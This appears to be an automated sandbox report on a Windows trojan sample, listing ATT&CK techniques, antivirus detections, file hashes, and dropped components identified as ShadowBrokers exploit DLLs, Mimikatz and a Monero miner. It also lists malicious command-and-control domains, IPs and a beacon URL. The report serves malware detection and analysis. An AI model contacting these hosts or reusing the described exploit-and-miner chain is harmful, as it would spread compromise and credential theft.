      Source: C:\Users\user\Desktop\wuauclt.exe Code function: 0_2_00257881 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00257881
      Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03997CA0 Sleep,Sleep,DeleteFileA,GetVersionExA,Sleep,Sleep,Sleep,WaitForSingleObject,TerminateProcess,TerminateThread,Sleep,DeleteFileA,Sleep,Sleep,TerminateProcess,TerminateThread,Sleep,2_2_03997CA0
      Source: C:\Windows\SysWOW64\ctfmon.exe Code function: 15_2_00968EC0 socket,htons,htonl,bind,listen,15_2_00968EC0
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Code function: 21_2_02FA8EC0 socket,htons,htonl,bind,listen,21_2_02FA8EC0
      Source: C:\Windows\SysWOW64\dllhost.exe Code function: 23_2_02868EC0 socket,htons,htonl,bind,listen,23_2_02868EC0
      Source: C:\Windows\SysWOW64\dllhost.exe Code function: 24_2_02E08EC0 socket,htons,htonl,bind,listen,24_2_02E08EC0
      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
      Execution: 2 Native API; 2 Command and Scripting Interpreter; 1 Scheduled Task/Job; 2 Service Execution; Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript
      Persistence: 1 DLL Side-Loading; 122 Windows Service; 1 Scheduled Task/Job; Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows)
      Privilege Escalation: 1 DLL Side-Loading; 122 Windows Service; 411 Process Injection; 1 Scheduled Task/Job; Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows)
      Defense Evasion: 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading; 11 File Deletion; 12 Masquerading; 21 Virtualization/Sandbox Evasion; 411 Process Injection; Indicator Removal from Tools; Masquerading; Invalid Code Signature
      Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
      Discovery: 1 System Time Discovery; 1 File and Directory Discovery; 25 System Information Discovery; 1 Network Share Discovery; 231 Security Software Discovery; 21 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; 11 Remote System Discovery; 11 System Network Configuration Discovery
      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content
      Collection: 11 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
      Command and Control: 2 Ingress Tool Transfer; 2 Encrypted Channel; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
      Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
      Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
      Impact: 1 Data Encrypted for Impact; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact
      Behavior Graph ID: 576901, Sample: wuauclt.exe, Startdate: 23/02/2022, Architecture: WINDOWS, Score: 100

      Source | Detection | Scanner | Label
      wuauclt.exe | 83% | Virustotal |
      wuauclt.exe | 54% | Metadefender |
      wuauclt.exe | 96% | ReversingLabs | Win32.Trojan.Vools
      wuauclt.exe | 100% | Avira | HEUR/AGEN.1134403
      wuauclt.exe | 100% | Joe Sandbox ML |

      Source | Detection | Scanner | Label
      C:\Windows\NetworkDistribution\cnli-0.dll | 100% | Avira | TR/ShadowBrokers.xbdrs
      C:\Windows\SysWOW64\FunctionProtocolHost.dll | 100% | Avira | HEUR/AGEN.1107841
      C:\Windows\NetworkDistribution\adfw.dll | 100% | Avira | TR/ShadowBrokers.gpoeb
      C:\Windows\NetworkDistribution\adfw-2.dll | 100% | Avira | TR/ShadowBrokers.bhlos
      C:\Windows\NetworkDistribution\cnli-1.dll | 100% | Avira | EXP/Equation.H
      C:\Windows\SysWOW64\dllhostex.exe | 100% | Avira | HEUR/AGEN.1134782
      C:\Windows\SysWOW64\FunctionProtocolHost.dll | 100% | Joe Sandbox ML |
      C:\Windows\SysWOW64\WUDHostServices.exe | 100% | Joe Sandbox ML |
      C:\Windows\SysWOW64\dllhostex.exe | 100% | Joe Sandbox ML |
      C:\Windows\NetworkDistribution\adfw-2.dll | 83% | Metadefender |
      C:\Windows\NetworkDistribution\adfw-2.dll | 96% | ReversingLabs | Win32.Exploit.ShadowBrokers
      C:\Windows\NetworkDistribution\adfw.dll | 69% | Metadefender |
      C:\Windows\NetworkDistribution\adfw.dll | 89% | ReversingLabs | Win32.Exploit.ShadowBrokers
      C:\Windows\NetworkDistribution\cnli-0.dll | 75% | Metadefender |
      C:\Windows\NetworkDistribution\cnli-0.dll | 93% | ReversingLabs | Win32.Trojan.EquationDrug
      C:\Windows\NetworkDistribution\cnli-1.dll | 75% | Metadefender |
      C:\Windows\NetworkDistribution\cnli-1.dll | 96% | ReversingLabs | Win32.Trojan.Equation
      C:\Windows\SysWOW64\WUDHostServices.exe | 33% | Metadefender |
      C:\Windows\SysWOW64\WUDHostServices.exe | 69% | ReversingLabs | Win32.Hacktool.Mimikatz
      C:\Windows\SysWOW64\dllhostex.exe | 54% | Metadefender |
      C:\Windows\SysWOW64\dllhostex.exe | 90% | ReversingLabs | Win32.Trojan.Miner
      No Antivirus matches
Source | Detection | Scanner | Label
https://www.disneyplus.com/legal/your-california-privacy-rights | 0% | URL Reputation | safe
https://www.disneyplus.com/legal/privacy-policy | 0% | URL Reputation | safe
https://www.tiktok.com/legal/report | 0% | URL Reputation | safe
https://www.tiktok.com/legal/report/feedback | 0% | URL Reputation | safe
http://help.disneyplus.com. | 0% | URL Reputation | safe
http://log.boreye.com/ipc.html?mac=EC:F4:BB:EA:15:88&ip=192.168.2.4&host=581804&tick=71min&c=Install_Done | 100% | Avira URL Cloud | malware
https://disneyplus.com/legal. | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
p.boreye.com | 72.52.178.23 | true | true | | unknown
log.boreye.com | 72.52.178.23 | true | true | | unknown
bk.estonine.com | 5.79.71.205 | true | true | | unknown
load.affordblue.com | unknown | unknown | true | | unknown
r.affordblue.com | unknown | unknown | true | | unknown
date.affordblue.com | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://log.boreye.com/ipc.html?mac=EC:F4:BB:EA:15:88&ip=192.168.2.4&host=581804&tick=71min&c=Install_Done | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.disneyplus.com/legal/your-california-privacy-rights | svchost.exe, 00000026.00000003.915409507.0000023E0777F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.915837601.0000023E077C1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.915614934.0000023E077C1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.916050131.0000023E077A1000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.disneyplus.com/legal/privacy-policy | svchost.exe, 00000026.00000003.915409507.0000023E0777F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.915837601.0000023E077C1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.915614934.0000023E077C1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.916050131.0000023E077A1000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.tiktok.com/legal/report | svchost.exe, 00000026.00000003.917440832.0000023E07757000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.tiktok.com/legal/report/feedback | svchost.exe, 00000026.00000003.917440832.0000023E07757000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.917806512.0000023E07C43000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.917507723.0000023E0778D000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://help.disneyplus.com. | svchost.exe, 00000026.00000003.915409507.0000023E0777F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.915837601.0000023E077C1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.915614934.0000023E077C1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.916050131.0000023E077A1000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://disneyplus.com/legal. | svchost.exe, 00000026.00000003.915409507.0000023E0777F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.915837601.0000023E077C1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.915614934.0000023E077C1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.916050131.0000023E077A1000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
72.52.178.23 | p.boreye.com | United States | 32244 | LIQUIDWEBUS | true
                  IP
                  Joe Sandbox Version:34.0.0 Boulder Opal
                  Analysis ID:576901
                  Start date:23.02.2022
                  Start time:03:16:15
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 12m 51s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:wuauclt.exe
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:41
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.expl.evad.mine.winEXE@48/9@202/67
                  EGA Information:
                  • Successful, ratio: 100%
                  HDC Information:
                  • Successful, ratio: 80.7% (good quality ratio 75.1%)
                  • Quality average: 78.6%
                  • Quality standard deviation: 29.5%
                  HCA Information:
                  • Successful, ratio: 85%
                  • Number of executed functions: 172
                  • Number of non-executed functions: 283
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .exe
                  • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                  • Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.54.7.98, 20.54.104.15, 40.112.88.60
                  • Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, settings-win.data.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, go.microsoft.com, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
                  • Not all processes were analyzed, report is missing behavior information
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
03:17:18 | API Interceptor | 1808x Sleep call for process: svchost.exe modified
03:17:28 | API Interceptor | 84x Sleep call for process: ctfmon.exe modified
03:17:37 | API Interceptor | 28x Sleep call for process: SearchProtocolHost.exe modified
03:17:48 | API Interceptor | 54x Sleep call for process: dllhost.exe modified
Match: log.boreye.com
Associated Sample Name / URL | Detection | Context
sample.exe | malicious | 127.0.0.1
Match: LIQUIDWEBUS
Associated Sample Name / URL | Detection | Context
FACT10-10-10.vbs | malicious | 72.52.145.108
RICHIESTA DI OFFERTA.xlsx | malicious | 67.227.172.217
FACT320-320-320.vbs | malicious | 72.52.145.108
FACT797-797-797.vbs | malicious | 72.52.145.108
FACT888-888-888.vbs | malicious | 72.52.145.108
FACT138-138-138.vbs | malicious | 72.52.145.108
mLHICNXJ4y.exe | malicious | 69.167.175.206
W9099.xlsx | malicious | 69.16.230.42
JXYuJVWLs1.exe | malicious | 69.167.175.206
Contract document.exe | malicious | 69.167.175.206
VIXfePT6im.exe | malicious | 69.16.230.42
8wJlse1uhy.dll | malicious | 209.59.138.75
LAJ-010122 EHCW-310122.xlsm | malicious | 209.59.138.75
5fcAsCaKa3.dll | malicious | 209.59.138.75
E5sfJfqd3E.dll | malicious | 209.59.138.75
71J4Ny4b8g.dll | malicious | 209.59.138.75
ddfk9AWsVd.dll | malicious | 209.59.138.75
71J4Ny4b8g.dll | malicious | 209.59.138.75
pFPyeruC.dll.dll | malicious | 209.59.138.75
EXnOJ.dll | malicious | 69.16.218.101
                  No context
Match: C:\Windows\NetworkDistribution\adfw-2.dll
Associated Sample Name / URL | Detection
aa.exe | malicious
WB.exe | malicious
WemErf4hKJ.exe | malicious
wannamine.exe | malicious
VHakUfygOi.exe | malicious
6Ygm6PcvER.exe | malicious
OmFU9N4P4C.exe | malicious
Trojan.EquationDrug.exe | malicious
4VsOUQIrYs.exe | malicious
eCSVrYRmTe.exe | malicious
7YI2Cl6hM2.exe | malicious
lucifer-ver1.exe | malicious
svsc5h.ex.exe | malicious
Setup.exe | malicious
                                              Process:C:\Windows\SysWOW64\ctfmon.exe
                                              File Type:Zip archive data, at least v2.0 to extract
                                              Category:dropped
                                              Size (bytes):3422184
                                              Entropy (8bit):7.9992715249930395
                                              Encrypted:true
                                              SSDEEP:98304:ZzJRZodUdRbKwB5/bVugWxquZ096wZjxTv62:ZzvZoadswPopxquqDL62
                                              MD5:60BA2A4B8EA5982A3A671A9E84F9268C
                                              SHA1:A0F4F8FCBA8CDFE4E0E13789FC9180B1C45FA70B
                                              SHA-256:8E03F05ECD08CB78F37CCD92C48CD9D357C438112B85BD154E8261C19E38A56E
                                              SHA-512:0DA30F00375C892A09B5104B1EEAC91833D66A6634DA4445CC2BFEF089C3F7B3878228791918DFD6B664C532F333F0C8A9030075768BFB9B188E40C8A59D59B8
                                              Malicious:false
                                              Process:C:\Windows\SysWOW64\ctfmon.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):14848
                                              Entropy (8bit):5.817336014139011
                                              Encrypted:false
                                              SSDEEP:192:MVNXJhMjaCCp8E5HPyjGgGzvb28sEwdMsKK2uHoosBkM2NFNz4l5Ztt5lIb/L+:e7Mj1Cp8+Qqzvq8BwDA1Z10Dz4DWn
                                              MD5:31D696F93EC84E635C4560034340E171
                                              SHA1:A3037A47CC291BBF8D1CA82C353783159BAF1850
                                              SHA-256:F06D02359666B763E189402B7FBF9DFA83BA6F4DA2E7D037B3F9AEBEFD2D5A45
                                              SHA-512:14EFE9EDC58640CA78C5C8B965D2B5D70ACED8B0EF2E33F5D15B0C34A7E81B00F078B193B051D671D5802228373037EB32B6FFAE8D8577F9913C80952B5895DE
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Metadefender, Detection: 83%, Browse
                                              • Antivirus: ReversingLabs, Detection: 96%
                                              Joe Sandbox View:
                                              • Filename: aa.exe, Detection: malicious, Browse
                                              • Filename: WB.exe, Detection: malicious, Browse
                                              • Filename: WemErf4hKJ.exe, Detection: malicious, Browse
                                              • Filename: wannamine.exe, Detection: malicious, Browse
                                              • Filename: VHakUfygOi.exe, Detection: malicious, Browse
                                              • Filename: 6Ygm6PcvER.exe, Detection: malicious, Browse
                                              • Filename: OmFU9N4P4C.exe, Detection: malicious, Browse
                                              • Filename: Trojan.EquationDrug.exe, Detection: malicious, Browse
                                              • Filename: 4VsOUQIrYs.exe, Detection: malicious, Browse
                                              • Filename: eCSVrYRmTe.exe, Detection: malicious, Browse
                                              • Filename: 7YI2Cl6hM2.exe, Detection: malicious, Browse
                                              • Filename: lucifer-ver1.exe, Detection: malicious, Browse
                                              • Filename: svsc5h.ex.exe, Detection: malicious, Browse
                                              • Filename: Setup.exe, Detection: malicious, Browse
                                              Process:C:\Windows\SysWOW64\ctfmon.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):11264
                                              Entropy (8bit):5.441348333234003
                                              Encrypted:false
                                              SSDEEP:192:IUMgnCxDh5tTo6RI/J24SBWVnNWUYiVwy2:IGnK5t06mw4SMjvjVwy2
                                              MD5:770D0CAA24D964EA7C04FF5DAF290F08
                                              SHA1:0D7894B6381C127C49F3892A862EAF37393D0355
                                              SHA-256:C51BCE247BEE4A6F4CD2D7D45483B5B1D9B53F8CC0E04FB4F4221283E356959D
                                              SHA-512:8EA364A7FE76A27037CB775B0A20F4D56B342376642F4A775DE86493AAD0F932A5C2960714BE9545F5DD8B430CB614A2ADA8152D45861B54D7206EBA00552BFB
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Metadefender, Detection: 69%, Browse
                                              • Antivirus: ReversingLabs, Detection: 89%
                                              Process:C:\Windows\SysWOW64\ctfmon.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):106496
                                              Entropy (8bit):6.055303021775208
                                              Encrypted:false
                                              SSDEEP:3072:0AR4j07EsMYGkIiF74OF3EaH0Yh2wfREJP2zFZ:0AR4sikI28OF3Ey2wdFZ
                                              MD5:EE2D6E1D976A3A92FB1C2524278922AE
                                              SHA1:B5CB931C178AE23145D94125C80784E8DB19AE69
                                              SHA-256:D3DB1E56360B25E7F36ABB822E03C18D23A19A9B5F198E16C16E06785FC8C5FA
                                              SHA-512:02CA33E132D9F062091ADDD4E262ECBF105CB29448AF0A759C33D85686D8EF8F3BEE746B99F7DBB1039494F5E9F1ACB1DE8EB1D1B4BC5292781F37422397CAC7
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Metadefender, Detection: 75%, Browse
                                              • Antivirus: ReversingLabs, Detection: 93%
                                              Process:C:\Windows\SysWOW64\SearchProtocolHost.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):100864
                                              Entropy (8bit):6.5974034404211235
                                              Encrypted:false
                                              SSDEEP:3072:LrZL1wTcqmJ3QthbjsKXhoF3P3aTCLEA7HHxJPt:LN47aF3CTC37H
                                              MD5:A539D27F33EF16E52430D3D2E92E9D5C
                                              SHA1:F6D4F160705DC5A8A028BACA75B2601574925AC5
                                              SHA-256:DB0831E19A4E3A736EA7498DADC2D6702342F75FD8F7FBAE1894EE2E9738C2B4
                                              SHA-512:971C7D95F49F9E1AE636D96F53052CFC3DBDB734B4A3D386346BF03CA78D793EAEE18EFCAE2574B88FDEE5633270A24DB6C61AA0E170BCC6D11750DBD79AD0AF
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Metadefender, Detection: 75%, Browse
                                              • Antivirus: ReversingLabs, Detection: 96%
                                              Process:C:\Users\user\Desktop\wuauclt.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):109056
                                              Entropy (8bit):6.177880655298613
                                              Encrypted:false
                                              SSDEEP:3072:A1eSFG0tXx+xcrH3tuI7Jdw6Lzw2biqqfjl0:A448SXtNxXcqIl0
                                              MD5:D228F4D6B772C764F2C6A539F2FC372D
                                              SHA1:F40CED80F6A11BDC46DC5EA54FBFD40549F5C9F2
                                              SHA-256:BF5D015CE8C0BEA1B91D81BD3AD0170729889AC4BD4B5AEC7FB45BD7BA27EC7D
                                              SHA-512:A132F777D05C16C3ADAC35D0ADB6828ECB323E56FBF00635DDE1AE11CD8A231C925F4CA2DBCE82C4E9D35744DFFD107AD2D7C3CF0C693897C57AAA7F5112266C
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Process:C:\Windows\SysWOW64\svchost.exe
                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):47104
                                              Entropy (8bit):5.32011324223062
                                              Encrypted:false
                                              SSDEEP:768:1QFj07RtFmEXoFVWp5U7HVqaLTen5VIvzF98Wk8YlLDVCeuxgQ1QRmBvU1tWlTh:1Qbi+e5UhRL6n5VIvzF98Wk8YlLDVCrr
                                              MD5:FC7880429D850789E40808D1AB45C119
                                              SHA1:9D6BB1BC89BAC653AE4D40107BBED6E07551D8EE
                                              SHA-256:C71623B62590E904E77F597B9F956A6F6A7B266206A75DDAC3FD91D86652E55D
                                              SHA-512:BAD391F5D0B014BFCB43015AC5E789E55B4492114516F09C4ECD1023470AD97AB824F929F4B9CE97DA56C55F7F94D82E0C9319488BDFD1E5B6834A8DA31525B4
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: hacktool_windows_mimikatz_copywrite, Description: Mimikatz credential dump tool: Author copywrite, Source: C:\Windows\SysWOW64\WUDHostServices.exe, Author: @fusionrace
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: Metadefender, Detection: 33%, Browse
                                              • Antivirus: ReversingLabs, Detection: 69%
                                              Process:C:\Windows\SysWOW64\svchost.exe
                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):1360384
                                              Entropy (8bit):6.566380061247949
                                              Encrypted:false
                                              SSDEEP:24576:wOTuFoSUpzjLJrr4FtnILnSqmdoRdSeUSjguAF11N0i7TwONgV0HL1z9ChftQAgr:2oSUpzjLJYFtnILtmdoRdgSjguA30i7v
                                              MD5:D0C6EDC58729D88970CB9EE8A456457C
                                              SHA1:2825E2D9B840C2AD2EED281908F527253640F36E
                                              SHA-256:710A4F3F2EB31C33610B3A8C7F751B2258275DD324595E2AB4EAE2BE18EF7AC9
                                              SHA-512:7919D4E923AFD96FAADF8BDC192ECFE7E05D34BA832C703ACA707E125CE710C786E10FBDB3CFFF29000FCA82100972357B9CAFB3A571F20EB42DECC5295A9951
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: C:\Windows\SysWOW64\dllhostex.exe, Author: Florian Roth
                                              • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: C:\Windows\SysWOW64\dllhostex.exe, Author: Florian Roth
                                              • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Windows\SysWOW64\dllhostex.exe, Author: Florian Roth
                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\SysWOW64\dllhostex.exe, Author: Joe Security
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: Metadefender, Detection: 54%, Browse
                                              • Antivirus: ReversingLabs, Detection: 90%
                                              Process:C:\Users\user\Desktop\wuauclt.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):7012537
                                              Entropy (8bit):7.998578830697322
                                              Encrypted:true
                                              SSDEEP:196608:U/jRO0gIK6THRglut4Skpg4Tfbu+g6rsvwue9iy:IgItHSSkpgKf6+g62wue9t
                                              MD5:2FFFB3077A386CD27259AC7A4957E1D6
                                              SHA1:022D49E632B2996E955D4EEBF360245C65A59093
                                              SHA-256:6790DF7AA6BC871DA4C62AF4DB9555DE3DE3B4813A0DF374B11F70DF81FBCCDB
                                              SHA-512:66AE49ED96D4AC304F05A5ED1F1D6AC1B021C02045FCD94DED3A3506C3EEF146DB835622133EB13BAA4B96799665ACDE98BE0F624B29F0D6DFC6C1F09A95AB5B
                                              Malicious:false
                                              File type:PE32 executable (console) Intel 80386, for MS Windows
                                              Entropy (8bit):7.995613039742854
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:wuauclt.exe
                                              File size:7154917
                                              MD5:a5cc0738a563489458f6541c3d3dc722
                                              SHA1:c4647225139bfde320f51f7af5751c33930f3787
                                              SHA256:032f2e845d2b9832c7845bc6a7de650ee2148891c8ee442fe3f3a8478e588dbe
                                              SHA512:3239e0fedecb92738fed530822bbe5b49c011cd425f162c2032df068ce676cb6286b1d2eb3d7711d090e5014228d1cf021410ff7d3351e81acbf1d046ab02537
                                              SSDEEP:196608:WIQ9gu6aCQeL7fgzVwu4UN6KB3/0V61S+I:WIsp6axeLCIE6QyIvI
                                              Icon Hash:00828e8e8686b000
                                              Entrypoint:0x407527
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows cui
                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                              DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                              Time Stamp:0x5C99CAE2 [Tue Mar 26 06:46:58 2019 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:1
                                              File Version Major:5
                                              File Version Minor:1
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:1
                                              Import Hash:1e13b98184e817c9666969f1c95dd10f
                                              Instruction
                                              call 00007F0250A501BAh
                                              jmp 00007F0250A4FCDFh
                                              push ebp
                                              mov ebp, esp
                                              push ecx
                                              push esi
                                              push dword ptr [ebp+08h]
                                              mov esi, ecx
                                              mov dword ptr [ebp-04h], esi
                                              call 00007F0250A4FEC5h
                                              mov dword ptr [esi], 0041926Ch
                                              mov eax, esi
                                              pop esi
                                              mov esp, ebp
                                              pop ebp
                                              retn 0004h
                                              and dword ptr [ecx+04h], 00000000h
                                              mov eax, ecx
                                              and dword ptr [ecx+08h], 00000000h
                                              mov dword ptr [ecx+04h], 00419274h
                                              mov dword ptr [ecx], 0041926Ch
                                              ret
                                              push ebp
                                              mov ebp, esp
                                              push ecx
                                              push esi
                                              push dword ptr [ebp+08h]
                                              mov esi, ecx
                                              mov dword ptr [ebp-04h], esi
                                              call 00007F0250A4FE8Ch
                                              mov dword ptr [esi], 00419288h
                                              mov eax, esi
                                              pop esi
                                              mov esp, ebp
                                              pop ebp
                                              retn 0004h
                                              and dword ptr [ecx+04h], 00000000h
                                              mov eax, ecx
                                              and dword ptr [ecx+08h], 00000000h
                                              mov dword ptr [ecx+04h], 00419290h
                                              mov dword ptr [ecx], 00419288h
                                              ret
                                              push ebp
                                              mov ebp, esp
                                              push esi
                                              mov esi, ecx
                                              lea eax, dword ptr [esi+04h]
                                              mov dword ptr [esi], 0041924Ch
                                              and dword ptr [eax], 00000000h
                                              and dword ptr [eax+04h], 00000000h
                                              push eax
                                              mov eax, dword ptr [ebp+08h]
                                              add eax, 04h
                                              push eax
                                              call 00007F0250A51DD9h
                                              pop ecx
                                              pop ecx
                                              mov eax, esi
                                              pop esi
                                              pop ebp
                                              retn 0004h
                                              push ebp
                                              mov ebp, esp
                                              sub esp, 0Ch
                                              lea ecx, dword ptr [ebp-0Ch]
                                              call 00007F0250A4FE13h
                                              push 0041F768h
                                              lea eax, dword ptr [ebp-0Ch]
                                              push eax
                                              call 00007F0250A51E36h
                                              int3
                                              mov eax, dword ptr [ecx+04h]
                                              Programming Language:
                                              • [ C ] VS98 (6.0) build 8168
                                              • [LNK] VS2015 build 23026
                                              • [RES] VS2015 build 23026
                                              • [IMP] VS2008 SP1 build 30729
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1fcc4 | 0x8c | .rdata |
